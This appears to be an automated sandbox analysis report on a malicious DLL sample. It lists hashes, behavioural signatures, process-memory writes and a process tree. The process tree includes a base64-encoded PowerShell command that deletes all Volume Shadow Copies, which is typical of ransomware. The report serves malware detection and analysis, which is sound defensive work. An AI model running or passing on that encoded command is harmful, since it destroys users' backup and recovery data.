Analysis
-
max time kernel
118s -
max time network
136s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 00:54
Static task
static1
Behavioral task
behavioral1
Sample
db583e09ea90ded0a3c534b0c71000fd2db204ddb6ade2431faa6c2e5adc4343.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
db583e09ea90ded0a3c534b0c71000fd2db204ddb6ade2431faa6c2e5adc4343.dll
Resource
win10-en-20211208
General
-
Target
db583e09ea90ded0a3c534b0c71000fd2db204ddb6ade2431faa6c2e5adc4343.dll
-
Size
164KB
-
MD5
ac3317e314bcdfba26c875d00e3bee70
-
SHA1
46679779e7de6cbc72b8c58cc64065edd191f226
-
SHA256
db583e09ea90ded0a3c534b0c71000fd2db204ddb6ade2431faa6c2e5adc4343
-
SHA512
f3f241370c733cbaf9667d1dc00a8480c8fe67a49118fef757a9bcb4602654db53efa454f03a2108fd49a60cd1be0ff902d535fd6132edc0f061ff42d39f2f97
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\T: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepowershell.exepid process 808 rundll32.exe 588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 588 powershell.exe Token: SeBackupPrivilege 1096 vssvc.exe Token: SeRestorePrivilege 1096 vssvc.exe Token: SeAuditPrivilege 1096 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1564 wrote to memory of 808 1564 rundll32.exe rundll32.exe PID 1564 wrote to memory of 808 1564 rundll32.exe rundll32.exe PID 1564 wrote to memory of 808 1564 rundll32.exe rundll32.exe PID 1564 wrote to memory of 808 1564 rundll32.exe rundll32.exe PID 1564 wrote to memory of 808 1564 rundll32.exe rundll32.exe PID 1564 wrote to memory of 808 1564 rundll32.exe rundll32.exe PID 1564 wrote to memory of 808 1564 rundll32.exe rundll32.exe PID 808 wrote to memory of 588 808 rundll32.exe powershell.exe PID 808 wrote to memory of 588 808 rundll32.exe powershell.exe PID 808 wrote to memory of 588 808 rundll32.exe powershell.exe PID 808 wrote to memory of 588 808 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\db583e09ea90ded0a3c534b0c71000fd2db204ddb6ade2431faa6c2e5adc4343.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\db583e09ea90ded0a3c534b0c71000fd2db204ddb6ade2431faa6c2e5adc4343.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1644
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1096
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/588-55-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmpFilesize
8KB
-
memory/588-57-0x0000000002660000-0x0000000002662000-memory.dmpFilesize
8KB
-
memory/588-58-0x0000000002662000-0x0000000002664000-memory.dmpFilesize
8KB
-
memory/588-59-0x0000000002664000-0x0000000002667000-memory.dmpFilesize
12KB
-
memory/588-56-0x000007FEF3790000-0x000007FEF42ED000-memory.dmpFilesize
11.4MB
-
memory/588-60-0x000000000266B000-0x000000000268A000-memory.dmpFilesize
124KB
-
memory/808-54-0x00000000766D1000-0x00000000766D3000-memory.dmpFilesize
8KB